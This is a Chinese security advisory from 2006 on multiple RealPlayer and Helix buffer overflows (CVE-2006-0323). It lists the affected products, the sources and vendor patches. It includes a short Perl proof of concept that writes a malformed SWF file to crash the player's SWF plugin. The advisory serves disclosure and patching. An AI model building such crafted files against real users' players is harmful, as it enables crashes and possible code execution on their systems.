安全研究
安全漏洞
RealNetworks产品多个缓冲区溢出漏洞
发布日期:2006-03-23
更新日期:2006-04-11
受影响系统:
Real Networks RealPlayer Enterprise 1.x描述:
Real Networks RealPlayer 8.0
Real Networks RealPlayer 10.x
Real Networks RealOne Player V2
Real Networks RealOne Player V1
Red Hat Enterprise Linux WS 4 Extras
Red Hat Enterprise Linux WS 3 Extras
Red Hat Enterprise Linux ES 4 Extras
Red Hat Enterprise Linux ES 3 Extras
Red Hat Enterprise Linux AS 4 Extras
Red Hat Enterprise Linux AS 3 Extras
Real Networks Helix Player 1.x
Red Hat Desktop 4 Extras
Red Hat Desktop 3 Extras
Real Networks Rhapsody 3
BUGTRAQ ID: 17202
CVE ID: CVE-2006-0323,CVE-2005-2310
RealNetworks提供各种媒体播放器,支持多种格式。
各种RealNetworks产品中存在多个溢出漏洞,允许攻击者入侵用户系统。
1) 处理SWF文件时的溢出漏洞允许在用户系统上执行任意代码;
2) 处理Web页面时存在堆溢出漏洞,允许在用户系统上执行任意代码;
3) 处理MBC文件时的溢出漏洞允许在用户系统上执行任意代码。
此外,在使用“CreateProcess()” API时的漏洞允许执行任意程序。
<*来源:John Heasman (nisr@nextgenss[.]com)
Greg MacManus
Sowhat (smaillist@gmail.com)
链接:http://secunia.com/advisories/19358/print/
http://marc.theaimsgroup.com/?l=bugtraq&m=114477627031783&w=2
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=404
http://lwn.net/Alerts/176852/?format=printable
http://www.idefense.com/application/poi/display?id=340&type=vulnerabilities&flashstatus=true
http://security.gentoo.org/glsa/glsa-200603-24.xml
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
###################################################
# RealPlayer: Buffer overflow vulnerability / PoC
#
# CVE-2006-0323
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0323
#
# RealNetworks Advisory
# http://service.real.com/realplayer/security/03162006_player/en/
#
# Federico L. Bossi Bonin
# fbossi[at]netcomm.com.ar
###################################################
# Program received signal SIGSEGV, Segmentation fault.
# [Switching to Thread -1218976064 (LWP 21932)]
# 0xb502eeaf in CanUnload2 () from ./plugins/swfformat.so
my $EGGFILE="egg.swf";
my $header="\x46\x57\x53\x05\xCF\x00\x00\x00\x60";
my $endheader="\x19\xe4\x7d\x1c\xaf\xa3\x92\x0c\x72\xc1\x80\x00\xa2\x08\x01".
"\x00\x00\x00\x00\x01\x02\x00\x01\x00\x00\x00\x02\x03\x00\x02".
"\x00\x00\x00\x04\x04\x00\x03\x00\x00\x00\x08\x05\x00\x04\x00".
"\x00\x00\x00\x89\x06\x06\x01\x00\x01\x00\x16\xfa\x1f\x40\x40".
"\x00\x00\x00";
open(EGG, ">$EGGFILE") or die "ERROR:$EGGFILE\n";
print EGG $header;
for ($i = 0; $i < 135; $i++) {
$buffer.= "\x90";
}
print EGG $buffer;
print EGG $endheader;
close(EGG);
建议:
厂商补丁:
Real Networks
-------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://service.real.com/realplayer/security/03162006_player/zh-cn/
Red Hat
-------
RedHat已经为此发布了一个安全公告(RHSA-2006:0257-01)以及相应补丁:
RHSA-2006:0257-01:Critical: RealPlayer security update
链接:http://lwn.net/Alerts/176852/?format=printable
Gentoo
------
Gentoo已经为此发布了一个安全公告(GLSA-200603-24)以及相应补丁:
GLSA-200603-24:RealPlayer: Buffer overflow vulnerability
链接:http://security.gentoo.org/glsa/glsa-200603-24.xml
所有RealPlayer用户都应升级到最新版本:
# emerge --sync
# emerge --ask --oneshot --verbose ">=media-video/realplayer-10.0.7"
浏览次数:3977
严重程度:5(网友投票)
绿盟科技给您安全的保障
